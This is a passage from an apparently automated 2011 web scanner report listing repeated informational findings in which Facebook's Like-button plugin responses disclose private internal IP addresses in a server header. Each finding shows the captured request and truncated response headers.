User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.61.54
X-Cnection: close
Date: Mon, 09 May 2011 15:37:15 GMT
Content-Length: 10000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.8. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1645adb2c%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff22a290894%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.128.57
X-Cnection: close
Date: Mon, 09 May 2011 15:41:57 GMT
Content-Length: 10006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.9. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c6192704%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff148f0b54%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/aboutus/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.79.43
X-Cnection: close
Date: Mon, 09 May 2011 15:38:59 GMT
Content-Length: 10020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.10. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df209e0862%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff56406db8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.118.35
X-Cnection: close
Date: Mon, 09 May 2011 15:39:07 GMT
Content-Length: 10000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.11. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.36
X-Cnection: close
Date: Mon, 09 May 2011 15:36:10 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.12. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm%2Fpage%2Fto%2Flike&layout=button_count&show_faces=false&width=125&action=recommend&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.75.60
X-Cnection: close
Date: Mon, 09 May 2011 15:36:54 GMT
Content-Length: 7034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.13. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.fox8live.com%2fs%2fywVthjF5R0-TVfelFm18GA.cspx&layout=standard&show_faces=false&width=375&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.37
X-Cnection: close
Date: Mon, 09 May 2011 15:41:40 GMT
Content-Length: 8113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.14. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm%2Fpage%2Fto%2Flike&layout=button_count&show_faces=false&width=125&action=recommend&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.64.56
X-Cnection: close
Date: Mon, 09 May 2011 15:38:02 GMT
Content-Length: 7034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.15. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.csmonitor.com%2FBusiness%2F2011%2F0509%2FGas-prices-start-to-head-down&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=box_count&action=recommend&width=90&height=65 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.78.51
X-Cnection: close
Date: Mon, 09 May 2011 15:39:17 GMT
Content-Length: 6932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.16. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.fox8live.com%2fs%2fvJUO9a9n60iNAXZ6QCm2oQ.cspx&layout=standard&show_faces=false&width=375&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.29
X-Cnection: close
Date: Mon, 09 May 2011 15:37:54 GMT
Content-Length: 8109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.17. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.fox8live.com%2fs%2fvJUO9a9n60iNAXZ6QCm2oQ.cspx&layout=standard&show_faces=false&width=375&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.25
X-Cnection: close
Date: Mon, 09 May 2011 15:37:59 GMT
Content-Length: 8109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.18. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e97b0d54%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff3b7816684%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.61.49
X-Cnection: close
Date: Mon, 09 May 2011 15:39:13 GMT
Content-Length: 10036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.19. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32a70df5%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff2ade04cb%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/entertainment/horoscopes/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.101.25
X-Cnection: close
Date: Mon, 09 May 2011 15:41:53 GMT
Content-Length: 10035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.20. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.35.45
X-Cnection: close
Date: Mon, 09 May 2011 15:38:08 GMT
Content-Length: 6943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.21. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e330ccb%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff3f167c8d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/watercooler/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.19.44
X-Cnection: close
Date: Mon, 09 May 2011 15:41:36 GMT
Content-Length: 10041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.22. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
